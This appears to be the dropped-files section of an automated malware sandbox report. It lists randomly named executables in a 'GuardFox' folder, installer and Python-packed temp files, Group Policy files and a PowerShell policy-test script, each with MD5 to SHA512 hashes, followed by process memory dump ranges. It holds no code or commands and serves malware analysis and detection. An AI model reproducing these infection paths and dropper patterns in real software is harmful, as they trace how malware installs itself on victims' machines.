C:\Users\Admin\Documents\GuardFox\6mW5b4qOjpVvTGG_x07s4stc.exe

MD5 cadf3a652abcf29e5696a961f0c8722c
SHA1 8a8f03874a314e11cc8463a068934357ce37c1a3
SHA256 b1aa828f1cca97ee2d691473bd37acc92f89b0bc971020b836aaa432ebeb9f5c
SHA512 08628dcf11ce9f3a3cf2ee7b48679b08ed6563bb13e657cf2dae932cd104cc4b1a21b233626998195f7663660f9f04f485a0064e179a09488d67f8e0f7e7e0db

memory/2136-173-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\oPAY0atGsFrz5J6mweTZuaDf.exe

MD5 aea679a1da357e0ae130e352ad6663ea
SHA1 e283a3144fff6b59f7751daccf5b4dc8acfa3ac2
SHA256 6dfc163a2ba56992e74d15cb4d50bfc2cb0cc9ab23114f08542d80770b33eb8d
SHA512 0874b0d53c0a032dc732e014d972f6912b0506f8a02f0f97baa40bf5da922b99b8af59b6bdabd098f9d88835b287a71404a318ad3e5c0cf2c5e89360a52e4704

C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe

MD5 1e73221a5533c52e9c0d7aabfedbb606
SHA1 d3760a24067e624a1dd8bbcf8e477564a56c52b3
SHA256 9f086d26e34fb1a68def7748203692c0089570a2c93868083b26e4bd5b9d6ca3
SHA512 81df6b67f92b6e0c460dac5d2cbbed1b4e105d6ba9fdeffd9edb7cd1bc6f0b0c82f1095bd91bd9f7bfcfa26a7f15e7aef7a8135599cd7a456ccd0584fdd2c3c2

memory/2136-411-0x00007FFC80010000-0x00007FFC80011000-memory.dmp

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

MD5 e02cfc4f71fe8d091f308df8e4d4347c
SHA1 4a689fc5c2eda63562d685cc683c84f84de55f31
SHA256 ee716d6300b1faf812bf2bfa685339e8d582f20cc3bfed68170bbb539e9abf1f
SHA512 82de5e1c0657b08a7b5bebf69aed5da63d59c55eb7667662558068e03fadb2d3e1b8d183c6416d2453749a97a0b0563f1be220d97f288661df95e4c28ba19715

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

MD5 c1cd28fec4dd4be627036cc8cc6925fd
SHA1 187ad7a23fae77fa2ceb98b379cfbc90677c80c6
SHA256 11749a7388f8c9c1123281b99c7c82a3e5df6c3dd46ecba563498b2089c0a307
SHA512 392d49aa65a695ef968e45c070aed963dca3649344fe3d561e46dd11824834ca4b1d9a1c0229b7be0435c2bbf9806fab6ba3b6c16064d30e62b5e611f1cef6d9

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

MD5 5b022efe18c209f43ea1016914f13742
SHA1 4ae70848fc4cc06b17879cb2f2d85a38e03ca4f6
SHA256 a01cef2df9c1c35bb0962b0df8d53fd6ac206ea0351e3f3e1bc71660a05bf08f
SHA512 a9b13131a393d09a7feb3bc5fb6b0b8d348d2a2ca932af29b3c4ccde7a843474889e89074097cc8a5b6b58a014d0c37ead03b10dd90671a777a999961946e843

C:\Users\Admin\Documents\GuardFox\97ctR1cufJfKYreB2JRoqsia.exe

MD5 4d1a7fa8b25aa1b80b9bf328c70f7439
SHA1 85ef029f03d38cc50c68bdc6d2a557e017c0ea83
SHA256 08b58e4ba2809f6103644477eae39ab14ae5b9eb32a9b7956449e960208e3cfd
SHA512 c8c34306299c81fdd819f3182cc3f373c84b7268947378f9c1b0f4b193db42e412b959b368b2373e2f74ee535d48fa9b714f68aa394cd99d5b1cb33d7e88d9a2

C:\Users\Admin\Documents\GuardFox\eQYk_b6jz16mJKmMtyzJXk5e.exe

MD5 8b64f6f3fc130fec52d3cc2af51e5c83
SHA1 817984c213602c18551b50bf858e17efe3ee225a
SHA256 5b6cf1cc98c8fde91d35ceaabc48e0a9587400ed6c3eecd106a43b2d5798f983
SHA512 04e67dfc33281c43c9687aa3deb3f9c0dfbd385f3c922f81e9741066463598d812238ea4c259840662abbd7c176ba4001d357f292ec1fd9ea5d4253714718493

C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe

MD5 a3c50d1f9b80c77ad895091b6e09d2ae
SHA1 46a333b26f1590466509c9da322a1e1aa8d63855
SHA256 22282798185305c4385d84cffa720668846caed239ab0dfd7a10e3e5066faa46
SHA512 ee68b9a094f7a024f0856b3377de2c5b1095366896e66e803a40a7dccd6eb142e986db47eb64d8ae7791d43459c337ecc08d0a07290a7fcb02cd815871f4d8aa

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

MD5 0f8ce9430bc1c20bdfad650561e09b93
SHA1 78d44519efad5244da9770a64860eabf20701cc9
SHA256 881d807ceb5563e809cfb5920d1368180417c73940c35d0881d7033c8eb8c7d1
SHA512 78d7b11ba9f190f103dcfa54f136acb208f9b18bf756eefd788bc42ab6a2627b2cf183eb240ece76aab90da49ad977de90a57ba97d7acf06652cbb2772b394a0

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

MD5 c6bc17d04af45969068014c711781639
SHA1 6d6fdda2a681dd93a7da3bad26b70c2d1fe5a668
SHA256 766c4a1449e527e1ab7e85ceb70c0517d66d665d520c870878a16493a72a4a25
SHA512 f9ac50c8a561147abb7da38901cc08b6d9fd42943d15655712945ee0a4e767e0029a0536b08634010014a0d30a3a2e221bb3c9417a0c5e85630ec48883345492

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

MD5 0cb6593f620acc57ffcba8c27ef072f4
SHA1 ae832ff96d6ec22d43c4cac08bb42626271ad34f
SHA256 28b7439d48cd5fa2365f2aa69a69d88f4b2d0b445d9b0d004ee62a466b8216ec
SHA512 180b796faa1397c7f26df7340ccde58224fe70bd6f5822621053513a3d462dc3b6801974b4a5b8548d2bef4de63b50c6b8f82e2ed91a28f10da136a6d96b47f9

memory/5632-610-0x0000000000BF0000-0x00000000011A7000-memory.dmp

memory/5736-616-0x0000000004960000-0x0000000004994000-memory.dmp

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

MD5 88f23a34516b0333862eb84e364feb94
SHA1 562f52608a075400ba64dc98202aaf5924941d7a
SHA256 136ac1452a135b26c282a1527d4a239a80c272edcbb7ae1a1887f3d4779d14c1
SHA512 3f33c5ffdcf32bd1836ce5d415ca37ab11de5726b070db1d98a1bdfc4d015f06b9ef2ea3c4857bf76190917d14317bc5e9a72bd65b4cc36309c73be0900acc6a

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

MD5 a12364f305592a93bcc7d3b2710c8cd2
SHA1 32a6e38c0fb78245dea4a86cbc62ee25ffac982b
SHA256 c7bf5802880ac420a89c2c8286c2901005c251567f70609d9c2e52eb08f0ba24
SHA512 4791b461a17361ec0062427603241a5c3e1e74578b67a741ebf51bcdd784ff2d22a7a31fd618204cdbfb1e449fa5881a1c4ae5c7801a949f75ab15ba386c4598

C:\Users\Admin\Documents\GuardFox\Je5Umq1MWJcqIN0348bnKOfX.exe

MD5 5870b42b93eef6c36b9cf6956865b5d8
SHA1 97080728b5c43cfa1909422dd9706803b447ffa3
SHA256 78028a1a73d3c6ad6cd87dedf4689bb1c5716784bdd292dbcab9771ad8ca6d50
SHA512 5f7d38d942334c0b55f34d3a1914c69d46146c9fc8bc71c6aaec1e3c12891ee16bcf74405f24c56d985f97de15aa81b623f1859907a971b6df3929ab0be0a69f

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

MD5 76a095c622351abd8398c0ff8ac9fd0d
SHA1 fa0c305d6fccbcd1dbba1dfb62f31ac14fc118c5
SHA256 770c93aafd22f447fb2e30ac2719176447d6359ecb082b2e39541ece563340d4
SHA512 4c624415deb8922bb5f660d2ea555aa6bcf1e9fcfd91776af288ec9599ce6bce5010f21fb0f62011aa1a46f12bc3bb42e812d579d4ca9e13f18c7cd520005b24

C:\Users\Admin\AppData\Local\Temp\is-VM79T.tmp\eQYk_b6jz16mJKmMtyzJXk5e.tmp

MD5 1756d6fc7bf4213c8f0a521cd42d0ac6
SHA1 871962e45061751468d940000ee536794c269532
SHA256 c4b71ffb200f4b41f95b23aa3a2b90e6f87e5cd7ca4a9234e33ed441dcde7594
SHA512 694a8b76ffd5a1b78d63b628680e8997dbc0f06c4524804cd9da4e4d015c586c5a9145190a6dc44464592ac717df83ccce53401d68cd48703f932c6340e192ad

memory/5736-700-0x0000000000400000-0x0000000002D3F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MHR0A.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/6140-731-0x000000000201E000-0x00000000020B0000-memory.dmp

memory/4376-773-0x0000000000140000-0x0000000000386000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\python311.dll

MD5 145a16e3912bf0785b77b5648b09452b
SHA1 3dadfe65a95c01fc69052dd1375f5b7054d18531
SHA256 f8b67124cf483e32a4d689f956ab943156f9ac4ad37275ece7747f1c854fc831
SHA512 57657e17de12940410b90bf1c1587960cf10df0d5f7e655f011dbdba7e28f94a6b81bfddced8dc103f483e14f42b1d7cd1c66320010a02b8b2473c3f72a9da42

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\WW9_64.exe

MD5 9bd3ca4b28a05d2d9feb9d84bf01d8c9
SHA1 367b52d3cafdfd3fd9ce89873f48e72d751dfab0
SHA256 400d1351050c3208f78f852baec287756286dc48ca1d71024b3e662338f3f4d5
SHA512 ce6fd0c6285eb9323fc8e94302f22b3bc64538c8aa033b984ac4cc5cb99a1364a2a8f5b687c481d3fe2eb117410ba02dc4d9abad980d17c7e217675c2ca4a32e

C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/5608-793-0x0000000000400000-0x00000000007A1000-memory.dmp

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

MD5 5d4a3b2536c7939678743311e96be237
SHA1 e71b7421b84b3b3b7fd61d962a8e64101df4791d
SHA256 41d6d187c96ef8e8536e1ab6f127a4afd677823d14feab9aa837707d8857f1e4
SHA512 b3b28bec0f137a752cb451f0704a133a5599867d009320cb333f5539743ababab2ab596f5fc70f2e4fa036e66206821dfd35f322a26da51d88a6897c6916273f

memory/5608-801-0x0000000000400000-0x00000000007A1000-memory.dmp

memory/2136-799-0x00007FFC8F910000-0x00007FFC8FBD9000-memory.dmp

memory/5632-810-0x0000000000BF0000-0x00000000011A7000-memory.dmp

memory/1448-811-0x00000000072B0000-0x000000000758C000-memory.dmp

memory/6108-809-0x0000000000490000-0x0000000001213000-memory.dmp

memory/6132-818-0x00000000010B0000-0x00000000010B1000-memory.dmp

memory/6132-820-0x00000000010E0000-0x00000000010E1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 088fd337c5dd20af88887c935787b5b3
SHA1 75a1afbcc3c286b59124fa9c2499a17f5dfb456c
SHA256 6adb2c40431531065c4376a04f96964fd0645c2dfbe0edf8785f8bfad55fd3d7
SHA512 3d0007d5c7f59ff096639a9c4f892d12a8e0c5bf7ea1718238313014b69aef423b7c6095e51d91b8e38f4018e135a2d035ab806bb22315c389b07969ed17848f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

memory/6132-840-0x0000000001120000-0x0000000001121000-memory.dmp

memory/5308-842-0x0000000010000000-0x00000000105E6000-memory.dmp

memory/4376-848-0x00000000735A0000-0x0000000073D50000-memory.dmp

memory/5212-849-0x0000000000400000-0x000000000066F000-memory.dmp

memory/6132-852-0x00000000000F0000-0x0000000000B3B000-memory.dmp

memory/6132-846-0x0000000001130000-0x0000000001131000-memory.dmp

memory/6108-862-0x0000000001730000-0x0000000001731000-memory.dmp

memory/5480-865-0x0000000000400000-0x0000000000834000-memory.dmp

memory/6108-868-0x0000000003160000-0x0000000003161000-memory.dmp

memory/5212-872-0x0000000000400000-0x000000000066F000-memory.dmp

memory/2808-874-0x00000000735A0000-0x0000000073D50000-memory.dmp

memory/6108-873-0x0000000003180000-0x0000000003181000-memory.dmp

memory/6108-870-0x0000000003170000-0x0000000003171000-memory.dmp

memory/6108-864-0x0000000001890000-0x0000000001891000-memory.dmp

memory/5212-858-0x0000000000400000-0x000000000066F000-memory.dmp

memory/5736-812-0x0000000000400000-0x0000000002D3F000-memory.dmp

C:\Windows\System32\GroupPolicy\GPT.INI

MD5 7cc972a3480ca0a4792dc3379a763572
SHA1 f72eb4124d24f06678052706c542340422307317
SHA256 02ad5d151250848f2cc4b650a351505aa58ac13c50da207cc06295c123ddf5e5
SHA512 ff5f320356e59eaf8f2b7c5a2668541252221be2d9701006fcc64ce802e66eeaf6ecf316d925258eb12ee5b8b7df4f8da075e9524badc0024b55fae639d075b7

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 cdfd60e717a44c2349b553e011958b85
SHA1 431136102a6fb52a00e416964d4c27089155f73b
SHA256 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f
SHA512 dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

memory/6132-837-0x0000000001100000-0x0000000001101000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS23CF.tmp\Install.exe

MD5 0476e01c25c2c771aff612aa33e3e92b
SHA1 3a11e3063ce88c80cc340b4d54498db169ecade6
SHA256 2ab9a721492b870ada7b6d06e9f65485b2989e92ffed880e83f09d7eb4ae5243
SHA512 7d299d53b188de053c0ba02b60e51cca911f05a2ed7c2368dc75c61ac89582e5bcbca4661af438a8b4e1ec736acdd0d7b150ac0f9181256fecf6f1955e83ce67

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 2f91ed59aeb73cbe8230901b9e32edd8
SHA1 90c98fb8b9848e75e500f13dbfc0415087ab953f
SHA256 b9a00c55fd4da4f822123bf19d859a7bead86b7e86b9258e9c937f53fd2f3764
SHA512 c408ca52c34a5118a76159fd31fd973db5c28d03dd86de7204f6bb6c3a6aba14754025589f87f16443da6cda29bafbc2efc5aa28cba17f9e640e3fdd0e587823

memory/5480-838-0x0000000000400000-0x0000000000834000-memory.dmp

memory/2348-900-0x0000000004650000-0x0000000004686000-memory.dmp

memory/6132-827-0x00000000010F0000-0x00000000010F1000-memory.dmp

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

MD5 1ee7fca7754ddf63e554a84e5a46c867
SHA1 831934edebefdd2a16f8663a7cec2cb091b37f45
SHA256 cb9ac027ef9e4962f5e45fdf1464ad3b7ef3c5aed3fe214fd82b076d5fafdbb1
SHA512 596a515033c9e6353786a51f774e0f00e15344e45119c318b3f9508ee926c01951ea8c6ca048a48b8fc78bc8bf9454204017b783b041b9c5ce0fc958ad440a67

C:\Users\Admin\AppData\Local\Temp\7zS23CF.tmp\Install.exe

MD5 936cda9a3305cdbfb2030187e1e41c2f
SHA1 ee091c2ecffcb0d409bd69275f3d090f56c88f50
SHA256 33018966f2abe989f72556d1b72d4cfcc95d0aff876c2a9d9459f2369b10d930
SHA512 9a62255a6ec453aed464555e445fca543b235cab248b2431e685b062fe5e90d6806066341dce010ed717183c37bf94673c3c5f70f5c236981d2d47f4da546556

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

MD5 7dc7d544c9baa56f61bffc3361ff7bcb
SHA1 8fded8d3f54cc40e284be043902586c52fe035f3
SHA256 f9609d86edac2544126f179647a6e123473deb0e95707c90089b4358738b593d
SHA512 8012597c42c3880cc8ac99336acf6690f96a21d1648c5640138bfba0f1b2ba02c9fb159f2455208011e306c1f63280bc51a5ed1ba374c33a6f0510f06a6ba3c9

memory/2348-909-0x0000000004CC0000-0x00000000052E8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 0a36a24fefb82e041f59c6bd2e05618f
SHA1 0cce133657a85257d78d64e63f84811ade036452
SHA256 26687958e209c33dd41dc96e91c68858fe7f324cc6890220b40212fe8307d69d
SHA512 bbb7d297f5ae088eb69034331adaffab31a9ad1fd96054df6416b1681884491f2612eb236c0fdf44ce77fc97b6a2cf82842023d4cb952591078e62934f7e6a5b

memory/5480-821-0x0000000000400000-0x0000000000834000-memory.dmp

memory/2348-929-0x00000000054E0000-0x0000000005546000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jqvwvin3.05o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2348-930-0x00000000055C0000-0x0000000005626000-memory.dmp

memory/2348-928-0x0000000004BE0000-0x0000000004C02000-memory.dmp

memory/2348-960-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

memory/2808-817-0x0000000004F80000-0x000000000512A000-memory.dmp

memory/2348-963-0x0000000005C70000-0x0000000005CBC000-memory.dmp

memory/6132-814-0x00000000010A0000-0x00000000010A1000-memory.dmp

memory/2808-813-0x00000000052E0000-0x0000000005884000-memory.dmp

memory/5212-968-0x0000000000400000-0x000000000066F000-memory.dmp

memory/5744-808-0x0000000002EB0000-0x0000000002EBB000-memory.dmp

memory/5232-807-0x0000000000400000-0x0000000000414000-memory.dmp

memory/5744-806-0x0000000002EFE000-0x0000000002F14000-memory.dmp

memory/2136-803-0x00007FFC91C50000-0x00007FFC91E45000-memory.dmp

memory/5744-785-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/5752-802-0x0000000000400000-0x0000000002D3C000-memory.dmp

memory/2136-798-0x00007FFC90830000-0x00007FFC908EE000-memory.dmp

memory/2808-797-0x0000000005130000-0x00000000052DC000-memory.dmp

C:\Users\Admin\AppData\Local\22158657-fbde-415a-bad4-5bee4646aa0b\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

MD5 22f47bebb55c01d532eb786e3e77fcab
SHA1 5f12f51cc0a1b0d8d00af9faaeb51dccf331c777
SHA256 84bfc54ce235392286dde2a35d5214423b2c9753cb1eae47747986ecdf1f1cec
SHA512 11b7a29fcab9c4dae52ecf42159882a0399dd9f79a82f5f735e24560506e0b25c86fc96902bd62d85337b5d822dc7761f0478b39b04c77721b9becd36ebba297

memory/4068-976-0x00000000009D0000-0x0000000000FE2000-memory.dmp

memory/1448-794-0x0000000005CD0000-0x0000000006024000-memory.dmp

memory/2136-790-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe

MD5 50a05eb94d9139f02a863ff916d8a9d7
SHA1 d635d7e59873ce9483d14e71d10c5626e6c43701
SHA256 7a0f74c76783d47c21beb5be978f4cd9dd1f3db18b233e131dac56a72de5f4d2
SHA512 ac3f3ff645b2e25b3095658c7fb632bffc5543aee84532ec775c711f0521dafc095615bc72baa483907eb2f2d39a3f60a5815379bfb4313d74cb447eb8a17fd5

memory/1448-791-0x0000000005C30000-0x0000000005CCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\vcruntime140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\python311.dll

MD5 1fe47c83669491bf38a949253d7d960f
SHA1 de5cc181c0e26cbcb31309fe00d9f2f5264d2b25
SHA256 0a9f2c98f36ba8974a944127b5b7e90e638010e472f2eb6598fc55b1bda9e7ae
SHA512 05cc6f00db128fbca02a14f60f86c049855f429013f65d91e14ea292d468bf9bfdeebc00ec2d54a9fb5715743a57ae3ab48a95037016240c02aabe4bfa1a2ff4

C:\Users\Admin\AppData\Local\Temp\onefile_3900_133531816951741958\WW9_64.exe

MD5 d5069aed1a3e38091665384ef04ab686
SHA1 047a2384005af5ef03b86ff9d1c488caa5313ac2
SHA256 24eae9f8d1bde98d11afe4053b5bfdbfe19e01f8c379b3c0aa7df693bc1284e4
SHA512 d3c9fadc8c4b43b30aae2784049fe6af824cb42580ec4810210df49865591936c310b9033988ebb2629070d2e32a4bbc234942a282fa15e82df5b6e9645d850d

C:\Users\Admin\AppData\Local\Temp\7zSCBD.tmp\Install.exe

MD5 2ca3154c457c0fd1400bf816807f38d6
SHA1 799f89c96feabc3815e035a5779eecc3c5b9e3f2
SHA256 322eae909f92672c01a04f9835ac4053364580726990128ac05e7069c39001f3
SHA512 92293321463e912347a8d8e5dc991f439f37dc56a0413bdb8679054e877450fd48b41a7ef8ee76c0859ccf93888f4d57cf169ba724a19f8d307e5712b1aea505

memory/3412-771-0x0000000003270000-0x0000000003286000-memory.dmp

memory/5752-768-0x0000000002DC0000-0x0000000002DCB000-memory.dmp

memory/1448-767-0x0000000000C40000-0x000000000128A000-memory.dmp

memory/6140-764-0x00000000022F0000-0x000000000240B000-memory.dmp

C:\Users\Admin\Documents\GuardFox\Z78EaC7A1maUh2noqDPHqxE4.exe

MD5 d370a38b2453e70f918f92a8906a9664
SHA1 6fc39ffbf3ac2fe5b662565df769e83a6f87bec1
SHA256 52e6ccf5cc93a9d0660b9204e7d6ae218aa83237c09797ffb5bf41f299a78506
SHA512 4e112cc8de72b01c3498b2580c4d6f53d31022a64a9c1111fd8b166360361f62973432a05ab0badfac762c17ffa89d57b027e0b97cade69ebf2eea77522b6380

memory/5752-732-0x0000000002EA0000-0x0000000002FA0000-memory.dmp

memory/4344-730-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-MHR0A.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/4344-714-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\Documents\GuardFox\RDN8aZtoyFxR0Sp8P1YPHjjm.exe

MD5 84e5ccdfbdfd9d92456c890e6d8641d4
SHA1 bc1f99c3a86a6a3258e6baa57c26be3a4403146e
SHA256 d4b9f4354252a9c203a211d8d600113f9d236ecca6234f43b5aa02350b5b24cc
SHA512 5f57e132b811e83f167f4b624397262b83982c9781dd05cba20bd2de798fcf1fd010c268060fcdf5601d5c2af1d4a61c2ff8a3ed659a25ceb6a3ef1034b8cf4c

memory/4344-709-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\Documents\GuardFox\QoPxz2PXYbxFkd1ZtaGIY5nB.exe

MD5 f32230a1dc38cb27b47a11b56adb0969
SHA1 f3d2dab4676dda7dd6df125ef96967d3778b0726
SHA256 92170856ae8fa372d8cb3285781a5ab79fbf88a66fff3bb0817a467d775d2121
SHA512 a901c1f5bc069e1438da71ab265b91fba678035c56644ce4b601fbdbf9603577df7340a9749c8de8ecd66b48808ccd52e56cfcefd093cd837a5718fb8239f68b

C:\Users\Admin\Documents\GuardFox\fpvCTUbLstZ4r68szSFC59Mu.exe

MD5 4dfbb07f824d4f1106cc7fba9cbcfeb0
SHA1 f225ce68bc6dbcaed82aff71d96315f692c947d4
SHA256 03097d72e93fc715793b38011623e2d8d4f98caabb082c6c80a53f27da95a10d
SHA512 700da5bcf66429ee440864421588692344078274940e4179c958479c63471f415da181397231ad9ad6033f641cc3a1cb6075c3461f00e173197281e65c5f0dfe

C:\Users\Admin\Documents\GuardFox\Odt0imGpkgnE0De9TQmDwGiD.exe

MD5 d8666ba0b58b3d01ff7ebc4af4d85bbc
SHA1 bdf372e47c847132b28cdd123851b7852dd0c73e
SHA256 d50b970e3d61822619b1daf789d92859003316fe97be69c3f372902b700a461e
SHA512 de46227f7c8d69347ec3e63ac4fb730ce4b95730155549586dcd67b86bed2124eb083e74645cc38fbd48d8fec6a964d9a69be3282973bef35b923a4a33fd133f

C:\Users\Admin\AppData\Local\Temp\is-VM79T.tmp\eQYk_b6jz16mJKmMtyzJXk5e.tmp

MD5 40c92a8e43929c9d8f38c1cd29a33d42
SHA1 d736c68db624fdca36bd8c2b18d4a5cfad25e088
SHA256 1bea54b564637c6ea5b30839e6a2d12c3808f5c3e09c664f3aa8a4035cb910f8
SHA512 01bf5246ce33b09ac2a47bc0cfb103156fbee5c8e7bf8752d6a99eff83f627ba5ead8be7820b4d126cdca4f180474c069861837e8ab0837ec8037aad0b08f263

C:\Users\Admin\Documents\GuardFox\RZwYj5i1qII7mxAb7SqPKWq_.exe

MD5 a028b000e2bd8209c4f8f7f03b4b947a
SHA1 fc3e0cb9ffd9342d75a72f3c705ab550e05cd2a4
SHA256 490f627ba513a1ef51d10084676847b96e784a42120131e2f0119c32527f60d2
SHA512 de06303d4ba0af10c800fba5708ce04ed3899c1276d4a3d389eb091e6bcaa9a1cae85d1ab1d8a207d61e5aedffd5df96a9229a8dd9172a2d9108e668b37f09de

C:\Users\Admin\Documents\GuardFox\tICD3_G5dCLsOTlSefOYkF5v.exe

MD5 b10029ab906949f7c344b85c3526cd66
SHA1 23f80fef961c8db7e05d51a234485054b31b770c
SHA256 e622c0fd6ff58df7d32325c74a0caf5847f26f99d258c37859ff36fd7ac42f14
SHA512 9a0d4b653eb1ef777044d211ab2905d45f84a98bdf84c71e89cb9dd1463c220ea26281aac664953236851edc8cf2ddb87fefb20df13ac03af7b89376dfc3a1b8

memory/5232-611-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\Documents\GuardFox\TKKw1hmTwVBMTsgOoU3BCklJ.exe

MD5 3710a15a3365b51af36bfcf817041024
SHA1 178a22bb487e1e8aa562bcede0239345b9a563fb
SHA256 ac98fa31e27777d76b6026ba0aefc21d5f238488c4e57842740a60237301d4fb
SHA512 5e0a5c7240ea036df358a72750aa8f443cbcc29b9b357ba3fdd1964f48f2ccb467140d37deb81c6c18bc83d487a4bd6a6bb50f1b19baf8ac6765ce3eacc9f1ec

C:\Users\Admin\Documents\GuardFox\oPAY0atGsFrz5J6mweTZuaDf.exe

MD5 187dc52bc58a51b83e43579973ea5c13
SHA1 0e205249bc9ed1b3b0e243af3c48f35b0bb61a5f
SHA256 0ba849ce4aeb710ab0df5965daad0713679285004d0e6d77116639b9153d6bcd
SHA512 33a7c46f84f64967d44788a8d422608f9e19f41eef8ae40d5858207dfc7702256db8b335c9ef3732f9268cf45e9f00d27031461b52e12103598c6fc2b57ead9f

memory/2348-987-0x00000000735A0000-0x0000000073D50000-memory.dmp

memory/2348-1019-0x0000000006150000-0x00000000061E6000-memory.dmp

memory/1448-1020-0x00000000077D0000-0x0000000007962000-memory.dmp

memory/2348-1021-0x00000000060D0000-0x00000000060EA000-memory.dmp

memory/2348-1022-0x0000000006120000-0x0000000006142000-memory.dmp

memory/1448-1029-0x0000000003690000-0x00000000036A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/4208-1034-0x0000000000400000-0x0000000000494000-memory.dmp

memory/1448-1039-0x00000000735A0000-0x0000000073D50000-memory.dmp

